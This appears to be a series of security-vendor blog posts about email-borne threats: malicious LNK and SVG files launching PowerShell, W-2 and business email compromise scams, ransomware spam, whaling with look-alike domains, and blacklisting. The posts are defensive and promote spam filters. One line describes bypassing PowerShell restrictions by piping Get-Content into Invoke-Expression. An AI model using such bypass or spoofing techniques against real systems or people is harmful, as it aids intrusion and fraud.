Spammers and scammers are constantly updating their malware distribution tactics to ensure their malicious payloads are delivered to unsuspecting end users. However, Microsoft has spotted a major change to malware distribution tactics used by cybercriminals. The change has prompted the software giant to issue a new warning.
Malware, including ransomware, is commonly distributed via spam email. Links to malicious websites are used in an attempt to bypass spam filter controls; however, malicious attachments are the delivery mechanism of choice for many cybercriminal gangs. Malicious links are commonly blocked by web filtering solutions – WebTitan for example prevents all users from visiting websites known to be malicious.
To bypass spam filter controls, attachments rarely include the actual malware or ransomware files, instead the files contain scripts that download the malicious payload.
Due to the ease at which these malicious downloaders are being identified, malware distribution tactics have been changed. Rather than use these suspect files, cybercriminals have switched to file types that are less obviously malicious. Microsoft has noticed a trend for using LNK files and SVG files containing malicious PowerShell scripts.
LNK files are Windows shortcut files which usually point to some form of executable file. SVG (Scalable Vector Graphics) files are image files, and are much more innocuous. These files are typically opened with image software such as Adobe Creative Suite or Illustrator. Double clicking on these malicious LNK and SVG files will launch PowerShell scripts that download malware or ransomware.
Protecting against these types of attacks may seem fairly straightforward. It is possible, for example, to set restrictions on PowerShell commands to prevent them from running. However, even with restrictions in place, those policies can be easily bypassed. Intel Security has recently explained one such method: “PowerShell’s Get-Content can access the content of a .ps2 malware script and pass it to Invoke-Expression (iex) for execution.”
A W-2 Form phishing scam that has been extensively used to con businesses out of the tax information of their employees is now being used on educational institutions. School districts need to be on high alert as cybercriminals have them fixed in their cross-hairs.
Over the past few weeks, many school districts have fallen victim to the scammers and have disclosed the W-2 Form data of employees. Teachers, teaching assistants, and other members of school staff have had their Social Security numbers and earnings information sent to fraudsters. The data are used to file fraudulent tax returns in victims’ names.
At face value, the W-2 Form phishing scam is one of the simplest con-tricks used by cybercriminals. It involves sending an email to a member of the HR or payroll team asking for the W-2 Forms of all employees to be sent via email. Why would any employee send this highly sensitive data? Because the email appears to have been sent from individuals within the school district who have a genuine need for the information. This is why the W-2 Form phishing scam is so effective. In many cases, suspicions are not aroused for a number of days after the emails have been sent. By that time, fraudulent tax returns may have been filed in the names of all of the victims.
It is unknown how many school districts have been targeted to date with this W-2 Form phishing scam, although 10 school districts in the United States have announced that their employees have fallen for the scam this year and have emailed W-2 Form data to the attackers. In total, 23 organizations have announced that an employee has fallen for a W-2 Form phishing scam in 2017, and at least 145 organizations fell for similar scams last year.
Due to the number of attacks, the IRS issued a warning in early 2016 to alert all organizations to the threat. The increase in attacks in 2017 has prompted the IRS to issue a warning once again. While corporations are at risk, the IRS has issued a warning specifically mentioning school districts, as well as non-profits and tribal organizations.
The IRS warning explains how cybercriminals have started even earlier this year. While the W-2 Form phishing scam emerged last year, many attacks occurred relatively late in the tax season. Cybercriminals are attempting to get the data sooner this year. The sooner a fake tax return is filed, the greater the chance that a refund will be issued.
A variety of spoofing techniques are employed to make the email appear like it has come from the email account of an executive or other individual high up in the organization. In some cases, criminals have first compromised the email account of a board member, making the scam harder to identify.
This year has also seen a new twist to the scam with victims targeted twice. In addition to the W-2 Form scam, the victims are also subjected to a wire transfer scam. After W-2 Forms have been sent, a wire transfer request is made to the payroll department. Some organizations have been hit with both scams and have disclosed employees’ tax information and then made a wire transfer of several thousand dollars to the same attackers.
Protecting against these scams requires a combination of technology, training and policy/procedural updates. The first step for all organizations – including school districts – is to send an email to all HR and payroll staff warning them about these phishing scams. Staff must be made aware of the scam and told to be vigilant.
Policies and procedures should be updated requiring payroll and HR staff to authenticate any email request for W-2 Form data by telephone prior to sending the information.
An advanced spam filter – such as SpamTitan – can also greatly reduce the risk of W-2 Form scam emails being delivered to end users’ inboxes. Blocking suspicious emails will reduce reliance on training and user awareness of these scams. The spam filter will also be effective at blocking further scams and other malicious emails from being delivered.
Research conducted by the anti-phishing training company PhishMe has shown a worrying increase in phishing attacks in 2016 and has highlighted the importance of taking steps to reduce the risk of spear phishing attacks.
Unfortunately, cybercriminals are becoming much more adept at crafting highly convincing spear phishing campaigns. A wide range of social engineering techniques are used to fool employees into responding to the emails and the campaigns are becoming much harder to identify.
Unfortunately responding to these emails can result in email and network credentials being compromised, malware and ransomware being installed on corporate networks, and sensitive data being emailed to the attackers.
The study of phishing attacks in 2016 showed attacks increased by 55% year on year. PhishMe research shows that out of the successful data breaches in 2016, 90% started with a spear phishing email.
In 2016, business email compromise attacks rose by an incredible 1300%, while ransomware attacks increased 400%. Cybercriminals are attacking companies with a vigor never before seen and unfortunately many of those attacks have been successful.
The figures from the U.S. Department of Health and Human Services’ Office for Civil Rights – which tracks U.S. healthcare data breaches – show that 2016 was the worst ever year on record for healthcare data breaches. At least 323 breaches of more than 500 records occurred in 2016. Undoubtedly many more breaches have yet to be discovered.
Cybercriminals and hackers have employees firmly in their crosshairs. Unfortunately, employees are easy targets. A recent survey conducted by cybersecurity firm Avecto showed that 65% of employees are now wary about clicking on links emailed to them by strangers. Alarmingly, that means 35% are not.
The same survey showed that 68% of respondents have no concerns about clicking on links sent by their friends and colleagues. Given the extent to which email addresses and passwords have been compromised in the last year, this is incredibly worrying. 1 billion Yahoo accounts were breached and 117 million email addresses were compromised as a result of the LinkedIn breach. Gaining access to email accounts is not a problem for cybercriminals. If those accounts are used to send spear-phishing emails, the chance of links being clicked are very high. Unfortunately, all it takes is for one email account to be compromised for access to a network to be gained.
The risk of spear phishing attacks was clearly demonstrated in 2015 when the largest ever healthcare data breach was discovered. 78.8-million health plan members’ records were stolen from Anthem Inc. That breach occurred as a result of an employee of one of the insurer’s subsidiaries responding to a spear phishing email.
Anthem Inc., is the second largest health insurer in the United States and the company spends many tens of millions of highly complex cybersecurity defenses. Those multi-million dollar defenses were undone with a single email.
Organizations must take steps to reduce the risk of speak phishing attacks. Unfortunately, there is no single solution to eradicate risk. A multi-layered defense strategy is required.
An advanced anti-spam solution is essential to prevent the vast majority of spam and phishing emails from being delivered to end users. SpamTitan for example, blocks 99.97% of spam email and 100% of known malware.
Employees must be trained and their training must be tested with phishing exercises. Practice really does make perfect when it comes to identifying email scams. Endpoint defenses should also be employed, along with anti-virus and antimalware software.
The risk of spear phishing attacks will increase again in 2017. Doing nothing to improve cybersecurity defenses and combat the spear phishing risk could prove to be a very costly mistake.
All antispam solutions and spam filters check inbound messages for common spam signatures; however, it is also important to choose a solution that performs outbound email scanning. Outbound email scanning ensures spam emails, or emails containing malware, are not sent from an organization’s email accounts or domains.
Your employees would be unlikely to knowingly use their corporate email accounts to send spam emails, but malware infections can allow cybercriminals to gain access to email accounts and use them to send high volumes of spam email messages. Cybercriminals could also compromise email accounts and use an organization’s domain to send malware and ransomware to clients and customers.
Should this happen, it can have a seriously detrimental effect on an organization’s reputation and may result in corporate email accounts or an entire domain being blacklisted.
Blacklists are maintained by a number of organizations – spamhaus.org for example. Internet Service Providers (ISPs), web servers, and antispam solutions check these blacklists before allowing emails to be delivered to end users. If a particular IP address, email account, or domain is listed in one of the blacklist databases, emails sent from the domain, IP address or email account will not be delivered.
Blacklists are updated in real-time and contain many millions of blocked domains and email addresses that have been reported as having been used for unwanted activity such as the sending of spam emails. If emails are sent from a blacklisted account, domain, or IP address those emails will either be directed to a quarantine folder, deleted, or will simply be rejected.
If a business has its domain added to a spam blacklist important emails to clients and customers will not get through. This can prove costly, as real estate firm Keller Williams has recently discovered.
Blacklisted Domains and Email Accounts Can Prove Costly for Businesses
Over the past few days, email messages sent from the kw.com domain used by Keller Williams have been rejected by AOL. Yahoo has been blocking emails from the kw.com account for some time. The problem appears to be the addition of the kw.com domain to spam blacklists.
If a Keller Williams real estate agent needs to send an email to a customer who has an AOL or Yahoo account, it will not be delivered. Agents have therefore been forced to get customers to open Google email accounts in order to send online paperwork or documents requiring e-signatures.
The issue also affects online paperwork sent via the transaction management software program Ziplogix, with one Keller Williams agent also claiming Dotloop is also affected. Some agents at Keller Williams have reportedly had to send important paperwork for listings and sales via personal email accounts to ensure emails are delivered.
The AOL website explains that when domains have been flagged as being abusive, the server will be temporarily blocked until the spamming stops. Until a domain is removed from its blacklist, AOL account holders will be prevented from receiving emails from the blocked domain. Removing the domain from the blacklist can take up to a week.
Removing a domain from the 80+ commonly used spam blacklists can be a time-consuming task; furthermore, if spam emails are sent from the account again, the domain will simply be added to the blacklists once more.
Outbound Email Scanning Prevents the Blacklisting of an Organization’s Domain
Unlike many third-party antispam solutions, SpamTitan checks incoming email messages for spam signatures as well as performing outbound email scanning. If an email account has been compromised and is being used to send spam emails, if malware is sending spam, those messages will be blocked and will not be sent. Outbound email scanning is an important protection that will prevent an organization’s domain or email accounts from being used to send spam or malware.
Organizations can therefore avoid the embarrassment and reputation damage that results from being suspected as engaging in spamming or malware delivery. They can also rest assured that in addition to blocking 99.97% of inbound email spam, their domains and email accounts will not be added to spam blacklists.
The Federal Trade Commission (FTC) in the United States has responded to the current ransomware epidemic by issuing ransomware advice for businesses and consumers. The FTC ransomware advice for businesses comes following a spate of high profile ransomware attacks on U.S businesses. The threat has prompted many U.S. government agencies to release ransomware advice for businesses in the past few months.
Ransomware is a form of malware that encrypts files on a victim’s computer and prevents them from being accessed. After a computer is infected, the attackers issue a ransom demand. In order to obtain the key to unlock the encryption the victim is required to pay a ransom. The ransom amount can be set by the attackers, although it is often around $500 per infected computer.
Ransomware has proved incredibly popular with cybercriminals as it offers a quick source of revenue. Since payment is made in an anonymous cryptocurrency such as Bitcoin, money can be collected without fear of being caught.
The scale of the problem has been shown by numerous reports by security firms. This month, SentinelOne released the results of a global survey that showed 48% of organizations had experienced at least one ransomware attack in the past 12 months. The companies that had been attacked had been forced to deal with an average of 6 ransomware incidents in the past year.
A report released by Beazley’s Breach Response Unit suggests ransomware attacks between January and September were four times higher than in 2015, while a report from Kaspersky Lab suggests there has been an eightfold increase in attacks in the past year.
Ransomware is installed via a number of different attack vectors. Ransomware gangs use exploit kits on websites that probe for vulnerabilities in browsers. Those vulnerabilities are leveraged to download ransomware. Malvertising is also used. This is the use of third party ad networks to spread malware. Adverts are created containing malicious code which directs users to websites that silently download ransomware. Ransomware downloaders were also allegedly sent out via Facebook Messenger this week.
While not all ransomware attacks result in files being encrypted, attacks carry a significant cost. SentinelOne suggests that in the United States, organizations spend an average of 38 man-hours restoring files from backups after a ransomware attack. Additional investment in security is also required after an attack.
Since ransomware can spread laterally across a network, a single infection can result in many computers being infected. Ransom demands of the order of tens of thousands of dollars are not uncommon. The recent ransomware attack on the San Francisco ‘Muni’ rail system saw a ransom demand of $73,000 issued.
Ransomware Advice for Businesses
Unfortunately, antivirus software can be ineffective at preventing ransomware attacks. Businesses looking to defend against ransomware must therefore use a range of techniques. These include:
- Ensuring all software is kept up to date and patches applied promptly
- Setting antivirus and antimalware programs to update definitions automatically
- Use endpoint security controls to prevent ransomware installations
- Implement a robust spam filter to prevent malicious emails from being delivered to end users
- Use a web filtering solution to prevent employees from visiting malicious websites and to monitor users’ online activities to identify high risk activities
- Use intrusion prevention software
- Train the workforce on security best practices and test knowledge to ensure training has been effective
- Ensure all members of staff are aware who to contact and what to do if they believe they have inadvertently installed malicious software
To avoid paying a ransom, it is essential to ensure that regular backups of data are performed. Multiple backups should be made to minimize the risk of data loss. Those backups should be stored on an air-gapped device to avoid backup files also being encrypted. A ransomware response plan should also be developed to reduce disruption to the business in the event of an attack.
Knowing how to avoid email server blacklisting is vitally important for any organization that relies on email as a channel of communication. The consequences of your email server being blacklisted can be costly, inconvenient, and potentially damaging to your organization´s credibility.
To best understand what email server blacklisting might mean to your organization, it is ideal to have a little knowledge about how email server filters work. Consequently we have divided this post into three sections explaining a little about email server filters, what may cause your email server to be blacklisted, and how to avoid email server blacklisting.
A Little about Email Server Filters
Email server filters do not actually filter your incoming emails at server level. They protect your organization from spam emails and other email-borne threats from the cloud or as a virtual appliance installed between your firewall and your email server. The distinction between the two types of filter is that virtual appliances can be more appropriate for some larger organizations.
Regardless of how they are deployed, email filters effectively work in the same way – using fast front-end tests to detect and reject the majority of spam emails before a deeper analysis is conducted of the email that remains. One of these front-end tests is a comparison of each email against a list of known sources of spam. This list is known as the Realtime Block List or RBL.
If your organization´s IP address appears on this list, all of your emails will be rejected by most email filters until the IP address is removed from the list – something that can take anything from 24 hours to six months to resolve completely. During this time you will have to ask your customers and other contacts to add your email address to a safe list or “whitelist”.
Why Was My Email Server Blacklisted?
There are several reasons why an email address (or IP address) can be blacklisted, and it is important to find out the exact reason(s) before trying to get your organization´s IP address removed from the Realtime Block List. If you fail to identify the cause, and fail to take steps to avoid email server blacklisting in the future, it can be much tougher to get un-blacklisted second time around.
Blacklisting typically occurs for one of several reasons:
- Your system has been infected with a spambot that has created multiple email accounts within your organization´s domain and is using those accounts to send out spam email.
- Someone in your organization may have revealed their login credentials and a spammer is using that information to send spam emails from the end-user´s email account.
- Emails sent innocently from one or more end-user accounts have had a high proportion of spam-related keywords, or have had infected files attached to them.
The last scenario is entirely possible if an end-user has prepared a presentation or spreadsheet on an infected home computer and bought the infected file into the workplace on a flash drive. Most email filters have antivirus software for identifying malware in attachments. If the infected attachment is sent to multiple recipients – and identified by multiple email filters – your organization´s IP address will quickly be blacklisted.
How to Avoid Email Server Blacklisting
Ideally, organizations should be able to avoid email server blacklisting by having robust antivirus protection and educating their end-users about online security. There should also be an email usage policy in place that would avoid email server blacklisting due to inappropriate content or unsafe attachments – even when these events occur inadvertently.
Unfortunately end-users are the weakest link in the security chain, and it only takes one end-user to click on a malicious URL or reveal their login credentials for an organization´s IP address to be blacklisted. In fact, if blacklisting is the worse consequence of a security breach, your organization has got off lightly and should consider itself lucky that the consequences were not far more serious.
Consequently, the best way how to avoid email server blacklisting is with an email filter that has malicious URL blocking to prevent end-users visiting malware-infested websites, with phishing protection to reject emails directing an end-user to fake website, and outbound scanning to identify potential spam and infections contained in – or attached to – outgoing emails.
Avoid Email Server Blacklisting with SpamTitan
Not all email filtering solutions have mechanisms to avoid email server blacklisting. However, SpamTitan has taken these factors into account in the design of SpamTitan Cloud and SpamTitan Gateway. Both of our solutions for email filtering use “URIBL” and “SURBL” protocols to compare links contained within inbound emails and their attachments against a global blacklist of known malicious and phishing sites.
The same protocols – along with several other mechanisms – are used in the scanning of outbound mail to ensure it is clear of viruses and could not be interpreted as having spammy content. Outbound scanning would also identify spam emails originating from a spambot or a compromised email account in order to prevent it from being sent and avoid email server blacklisting.
Naturally, you do not want your end-users to be under the impression that their emails have been sent when they are caught by the outbound filter. So SpamTitan Cloud and SpamTitan Gateway have comprehensive reporting features that advise of any problems in order that the problems can be rectified quickly and effectively – certainly more quickly than trying to get your organization´s IP address removed from a Realtime Block List.
The FBI issued a new public service announcement which includes new business email compromise scam data. The new data indicates U.S. businesses have lost almost $960 million to business email compromise scams in the past three years, and the total losses from these scams is now almost $3.1 billion.
What is a Business Email Compromise Scam?
A business email compromise scam is a sophisticated attack on a company by scammers that attempt to trick individuals into wiring funds from corporate accounts to the bank accounts of the attackers. Businesses most commonly targeted are those that frequently make foreign transfers to international companies. The attackers must first gain access the email account of the CEO or another high level executive. Then an email is sent from that account to an individual in the accounts department requesting a bank transfer be made. Occasionally the scammer asks for checks to be sent, depending on which method the targeted organization most commonly uses to make payments.
A business email compromise scam does not necessarily require access to a corporate email account to be gained. Attackers can purchase an almost identical domain to that used by the targeted company. They then set up an email account in the name of the CEO using the same format as that used by the company. This can be enough to fool accounts department workers into making the transfer. Business email compromise scams use a variety of social engineering techniques to convince the targeted accounts department employee to make the transfer.
Business Email Compromise Scams are a Growing Problem
The FBI has previously warned businesses of the growing risk of business email compromise scams. In April this year, the FBI Phoenix Office issued a warning about a dramatic rise in BEC attacks. The data showed that between October 2013 and February 2016 there had been at least 17,642 victims of BEC attacks in the United States, and the losses had reached $2.3 billion.
New data from the FBI suggest that the problem is far worse. The FBI has now incorporated business email compromise scam data from the Internet Crime Complaint Center (IC3). 22,143 reports have now been received from business email compromise scam victims, which correspond to losses of $3,086,250,090.
Between October 2013 and May 2016, there have been 15,668 domestic and international victims, and losses of $1,053,849,635 have been reported. In the U.S. alone, there have been 14,032 victims. Since January 2015, there has been a 1,300% increase in losses as a result of BEC attacks. The majority of the funds have been wired to Asian bank accounts in China and Hong Kong.
The FBI warns of five scenarios that are used by criminals to commit fraud using BEC scams:
- Requests for W-2s or PII from the HR department – The data are used to file fraudulent tax returns in the names of employees
- Requests from foreign suppliers to wire money to new accounts – Attackers discover the name of a regular foreign supplier and send an email request for payment, including new bank details (their own).
- Request from the CEO for a new transfer – The CEO’s (or other executive) email account is compromised and a request for a new bank transfer is sent to an individual in the accounts department who is responsible for making bank transfers
- A personal email account of an employee of a business is compromised – That account is used to send payment requests to multiple vendors who have been identified from the employee’s contact list
- Impersonation of an attorney – Emails are sent from attackers claiming to be attorneys, or representatives of law firms, requesting urgent transfers of funds to pay for time-sensitive matters
To protect against BEC attacks, businesses are advised to use 2-factor authentication on all business bank transfers, in particular those that require payments to be sent overseas. Organizations should treat all bank transfer requests with suspicion if a request is sent via email and pressure is placed on an individual to act quickly and make the transfer.
The FBI recommends that businesses never use free web-based email accounts for business purposes. Organizations should also be careful about the information posted to social media accounts, in particular company information, job descriptions and duties, out of office details, and hierarchical information about the company.
A new report by anti-phishing training company PhishMe shows a marked rise in the volume of ransomware emails in March. The report shows that spam emails are now predominantly being used to deliver ransomware to unsuspecting victims. The spike in ransomware emails highlights how important it is to conduct anti-phishing training and to use anti-spam solutions to prevent the malicious file-encrypting software from being delivered to employee’s inboxes.
Spike in Ransomware Emails as Criminals Seek Easy Cash
Ransomware has been around for about a decade, yet it has not been favored by cybercriminals until recently. Throughout 2015, under 10% of phishing emails were being used to transmit ransomware. However, in December there was a major spike in ransomware emails, which accounted for 56% of all phishing emails in December. The upward trend has continued in 2016 and by March, 93% of phishing emails contained ransomware – or were used to infect users by directing them to malicious websites where drive-by downloads of the malicious software occurred.
Spam email volume has been in general decline, in no small part to the shutting down of major botnets in recent years. However, that does not mean that the threat of cyberattacks via email can be ignored. In fact, PhishMe’s figures show there has been a surge in the number of phishing emails being sent. In the first quarter of 2016, the number of detected phishing emails soared to 6.3 million, which represents a 789% increase from the volume captured in the last quarter of 2015.
Ransomware is increasingly being used by cybercriminals for a number of reasons. Ransomware is now easy to obtain and send out. Many ransomware authors offer ransomware-as-a-service to any criminal looking to make a quick buck. Not only can the ransomware be hired for next to nothing, instructions are supplied on how to use it and criminals are allowed to set their own ransoms and timescales for payment. All they need to do is pay a percentage of the ransoms they obtain to the authors.
What makes the use of ransomware even more attractive is the speed at which criminals can get paid. Time limits for paying ransoms are usually very short. Demands for payment within 48 hours are not uncommon. While phishing emails have commonly been used to obtain credit card details from victims, which then need to be sold on, criminals can run a ransomware campaign and rake in Bitcoin payments in just a few days.
The ransoms being demanded are also relatively low. This means that many individuals can afford to pay the ransom to obtain the decryption keys to unlock their files, and businesses are also likely to pay. The cost of recovering data and restoring systems, together with the lost revenue from the time that computer systems are down, is often less than the ransom being demanded.
Ransomware Is Becoming Much More Sophisticated
The latest forms of ransomware now being used – Locky, CryptXXX, TeslaCrypt, and Samas (Samsam) – are capable of spreading laterally. Not only can the ransomware infect files on a single computer, other networked computers can also be infected, as can network drives, servers, portable storage devices, and backup drives. Some forms are also capable of deleting Windows shadow copies and preventing the restoration of files from backups.
All that the criminals need is for one business computer to be infected in order to encrypt files throughout the network. That means only one end user needs to be fooled into opening an infected attachment or visiting a malicious webpage.
Ransomware emails often contain personal information to increase the likelihood of an individual clicking a malicious link or opening an infected attachment. Word files are now commonly being used to infect users. Embedded macros contain code that downloads the malicious payload.
The malicious software is sent out in spear phishing campaigns targeting one or two users in a company, such as accounts and billing department executives. Personal information is often used in the emails – names, addresses, and job titles for example – to increase the likelihood of attachments being opened and links being clicked.
As criminals get better at crafting phishing emails and the ransomware becomes more sophisticated, it is more important than ever to use anti-spam solutions such as SpamTitan to trap ransomware emails and prevent them from being delivered. SpamTitan traps 99.9% of spam emails, helping organizations protect their networks from ransomware attacks.
According to a recent report on spam email from anti-virus software developer Kaspersky Lab, the decline in spam email over the past few years appears to have reversed, with the first quarter of 2016 seeing a major increase in malicious spam email volume.
Major Increase in Malicious Spam Email Volume Reported by Kaspersky Lab
Over the past few years there has been a decline in the number of spam emails, as cybercriminals have sought other ways to deliver malware and defraud computer users. In 2015, the volume of spam emails being sent fell to a 12-year low. Spam email volume fell below 50% for the first time since 2003.
In June 2015, the volume of spam emails dropped to 49.7% and in July 2015 the figures fell further still to 46.4%, according to anti-virus software developer Symantec. The decline was attributed to the taking down of major botnets responsible for sending spam emails in the billions.
Malicious spam email volume has remained fairly constant during 2015. Between 3 million and 6 million malicious spam emails were detected by Kaspersky Lab throughout 2015; however, toward the end of the year, malicious spam email volume increased. That trend has continued in 2016.
Image source: Kasperky Lab
Wide Range of Malicious Files Being Sent in Spam Email
While it was common for virus-loaded executable files to be sent as email attachments, these are now commonly caught by email filters and are marked as spam. However, spammers have been developing new methods of getting past traditional webmail spam filters. The spam emails intercepted by Kaspersky Lab now contained a wide variety of malicious files.
One of the most common methods now used by spammers is to send office documents infected with malicious macros. Microsoft Word files with the extension DOC and DOCX are commonly used, as are rich text format files RTF, Adobe PDF files, and Microsoft Excel spreadsheets with the extensions XLS and XLSX.
These file formats are commonly opened as many end users are less suspicious of office documents than they are about ZIP, RAR, and EXE files. Most office workers would know not to open a EXE file that was emailed to them by a stranger, yet an office document – a file format they use on a daily basis – is less likely to arouse suspicion.
Instead of the emails containing the actual malware, virus, or ransomware payload, they contain Trojan downloaders that download JS scripts. Those scripts then perform the final stage of infection and download the actual malware or ransomware. This method of attack is used to bypass anti-virus protections.
Web Filters and Email Spam Filters Should be Used to Reduce the Risk of a Malware Infection
There has been an increase in drive-by downloads in recent years as attackers have lured victims to websites containing exploit kits that probe for vulnerabilities in browsers and browser plugins. Visitors are redirected to these malicious websites when visiting compromised webpages, via malvertising, and malicious social media posts. While drive-by downloads are still a major threat, the use of web filters and anti-virus software browser add-ons are blocking these malware downloads and malicious websites.
Email is still a highly effective way of getting past security defenses and getting end users to install malware on their devices. Carefully crafted emails that include unique text increase the likelihood of the scammers getting users to open malicious attachments. Oftentimes, the messages include personal information about the recipient such as their name or address. This has helped the spammers to get the victims to take the desired action and run malicious macros and install malware.
It may be too early to tell whether spam email volume has only temporarily spiked or if there is a reversal in the decline of spam, but organizations and individuals should remain vigilant. The increase in malicious spam email volume should not be ignored.
Staff members should receive regular training on how to identify malicious email messages and phishing scams. It is also a wise precaution to use a robust spam filter such as SpamTitan. SpamTitan blocks 99.97% of malicious spam email messages, dramatically reducing the probability of malware, ransomware, adware, and spyware being installed.
Scammers are constantly coming up with crafty ways to fool computer users into revealing login credentials and installing malware, with the latest speeding ticket email scam being used for the latter. Emails are being sent to individuals claiming they have been caught driving too fast and are sent a link to click to pay their speeding ticket.
If the targeted individual clicks on the link contained in the spam email they will be directed to a malicious website that will download malware onto their computer.
This particular scam has been used to target drivers in Philadelphia. While the majority of spam emails are sent out randomly in the millions in the hope of fooling some individuals into clicking on malicious links, this particular campaign is anything but random. Individuals are being targeted that are known to have exceed the speed limit.
Not only have the attackers obtained the email addresses of their targets, they have also send details of where the individual exceeded the speed limit. So how is this possible?
This particular speeding ticket email scam is understood to have been made possible by the attackers hacking a Smartphone app that has access to the GPS on the phone. The attackers use location data and the phones GPS to determine which individuals have exceeded the speed limit. They are then sent a speeding ticket scam email telling them to click on a link where they can see details of their vehicle license plate in the location where the infraction took place. They are also informed of the speed limit in that location together with speed that the individual was travelling. The speeding driver is told he or she has 5 days to pay the citation.
While this speeding ticket email scam could easily be used by the attackers to obtain credit card details or phish for other information, it appears to only be used to install malware. Clicking on the link in the email to view license plate details does not actually reveal the image. It silently installs malware.
The police department in Tredyffrin, PA, where drivers were targeted with this speeding ticket email scam, has not cited callers for their speeding violations when they have called to query the fine, even when they have confessed to speeding over the phone.
How to Protect Yourself Against Email Scams
This speeding ticket email scam is particularly convincing as it uses real data to fool users into clicking on the malicious link. Many spam email campaigns now use personal information – such as real names and addresses – to fool targets into opening infected email attachments or clicking on malicious links. This type of targeted spear phishing email is now all too common.
To protect against attacks such as this, there are a number of steps that should be taken.
- If contacted by email and asked to click a link, pay a fine, or open an attachment, assume it is a scam. Try to contact the individual or company to confirm, but do not use the contact information in the email. Perform a search on Google to obtain the correct telephone number to call.
- Carefully check the sender’s email. Does it look like it is genuine?
- Never open email attachments from someone you do not know
- If you receive an email offering you a prize or refund, stay safe and delete the email
- Ensure that anti-virus software is installed on your computer and is up to date.
Businesses have been put on alert following the discovery of a new personalized phishing scam that attempts to trick users into installing malware on their company’s computers. These new personalized phishing scam emails are primarily being used to spread CryptoWall ransomware, although that is far from the only payload delivered.
New Personalized Phishing Scam Delivers Wide Range of Malware
The new scam is also being used to deliver the Arsnif/RecoLoad POS reconnaissance Trojan to organizations in the retail and hospitality industries, as well as the Ursnif ISFB banking Trojan.
The current attack does not target all employees. Instead it is used to try to install malware on the computers of users with elevated network privileges such as senior executives, CFO’s, senior vice presidents, CEO’s, heads of finance, and company directors. These individuals not only have access to a far greater range of data, they are also likely to have access to corporate bank accounts.
If the payload is delivered it can result in POS systems being infected, access to bank accounts being gained, as well as widespread data encryption with ransomware. Once single email could cause a considerable amount of damage. The emails are currently being used to target organizations in the financial services, although the retail, manufacturing, healthcare, education, business services, technology, insurance, and energy sectors have also received large volumes of these emails.
What makes this particular phishing campaign stand out is the fact that the emails have not been delivered to random individuals. Many spammers send out phishing emails in the millions in the hope that some individuals will respond. However, this is a personalized phishing scam targeting specific individuals. Those individuals have been researched and the emails include data specific to the target.
Each email refers to the recipient by name and includes their job title, address, and phone number in the body of the email. The subject is specific, the email crafted for a particular industry, and the attached files and links have been named to make them appear genuine. The emails have also been well written and do not contain the spelling and grammar mistakes typical of spam email.
A personalized phishing scam such as this is not usually conducted on such a large scale. Spear phishing emails are usually send to just a handful of individuals, but this personalized phishing scam is being sent to many thousands of people, in particular those in the Unites States, United Kingdom, and Australia.
The data used in the email body could have been harvested from a social media site such as LinkedIn, although the scale of the attack suggests data has been obtained from elsewhere, such as a previous cyberattack on another company such as a supplier or an Internet site. Companies that do not use a robust spam filter such as SpamTitan are particularly at risk.
If you work in the accounting department of your company, you need to be more vigilant as cybercriminals are specifically targeting account department executives. Whaling attacks are on the increase and cybercriminals are using domain spoofing techniques to fool end users into making bank transfers from corporate accounts. Once money has been transferred into the account of the attacker, there is a strong probability that the funds will not be recoverable.
Whaling, as you may suspect, is a form of phishing. Rather than cybercriminals sending out large volumes of spam emails containing malware or links to malicious websites, individuals are targeted and few emails are sent. Cybercriminals are putting a lot of time and effort into researching their targets before launching their attack.
The aim is to gather intel on an individual that has the authorization to make bank transfers from company accounts. Individuals are usually identified and researched using social media websites such as Twitter, LinkedIn, and Facebook.
When individuals are identified and the name and email address of their boss, CFO, or CEO is discovered, they are sent an email requesting a bank transfer be made. The email is well written, there is a pressing need for the transfer to be made, and full details are provided in the email. They are also given a reasonable explanation as to why the transfer must be made. The email also comes from senior management.
In the majority of cases, the transfer request will not follow standard company procedures as these are not known by the attackers. However, since an email will appear to have been sent from a senior figure in the company, some account department employees will not question the request. They will do as instructed out of fear of the individual in question, or in an attempt to show willingness to do what is required of them by their superiors.
Unfortunately for IT security professionals, whaling emails are difficult to detect without an advanced spam filtering solution in place. No attachments are included in the email, there are no malicious links, just a set of instructions. The attack just uses social engineering techniques to fool end users into making the transfer.
What is Domain Spoofing?
The whaling attacks are often successful, as users are fooled by a technique called domain spoofing. Domain spoofing involves the creation of an email account using a domain that is very similar to that used by the company. Provided the attacker can get the correct format for the email, and has the name of a high-level account executive, at first glance the email address will appear to be correct.
However, closer inspection will reveal that one character in the domain name is different. Typically, an i will be replaced with an L or a 1, an o with a zero, or a Cyrillic character may be used which is automatically converted into a standard letter. If the recipient looks at the email address, they may not notice the small change.
To reduce the risk of account department employees falling for whaling attacks, anti-spam solutions should be implemented and configured to block emails from similar domains. Staff must also be told not to make any transfer requests that arrive via email without first double checking with the sender of the email that the request is genuine, and to always carefully check the email address of the sender of such a request.
‘Tis the season to be jolly, but it is also the season for holiday email spam. Malware infections increase during holiday periods and this year is unlikely to be any different. Holiday email spam is coming, and it doesn’t matter whether you’ve been naughty or nice. If you do not take precautions, you are likely to receive a gift of malware this Christmastime.
Holiday email scams are sent in the billions at this time of year because of one simple fact: They work. People let their hair down over Christmas and New Year, but they also let their guard down. That gives online criminals an opportunity to get malware installed, fool consumers with phishing campaigns, and generally cause some festive mayhem.
Holiday email spam is now being sent: Avoid the Christmas rush and get your malware now!
Christmas week may see many people infected with malware, but the run up to Christmas can be even worse. As soon as the first decorations go up in the shops, holiday email spam starts to be sent. Email is commonly used to send malware.
Nasty malicious programs are masked as Christmas screensavers, phishing campaigns will appear as festive quizzes, and you can expect an African prince to need your assistance with a huge bank transfer. Don’t be surprised to find out that you have won a Sweepstake in a country you have never visited or that one of your online accounts will be hacked requiring you to receive technical support.
These and many more scams will be delivered in a wave of holiday email spam and, if you let your guard down, you may inadvertently fall for one of these often cleverly devised scams. Some of the latest phishing scams are incredibly convincing, and you may not even realize you have fallen for the scam and have become a victim.
Employers Beware: End users are especially gullible at this time of year
Everyone must be wary at this time of year due to the huge increase in spam email campaigns. Employers especially must take care as employees can be particularly gullible at this time of year. Their minds are on other things, and they are not as diligent and security conscious as they may usually be.
To make matters worse, each year the scammers get better and holiday email spam becomes more believable. If one of your employees falls for holiday email spam attack, it may not only be their own bank account that gets emptied. Phishing campaigns are devised to get employees to reveal critical business data or login credentials. The FBI has warned that business email is being targeted. In the past two years over 7,000 U.S. firms have been targeted and have suffered from criminal attacks. Those attacks initially target employees, and the festive season is an ideal time for a business email compromise (BEC) attack to take place.
Common Holiday Email Spam Campaigns in 2015
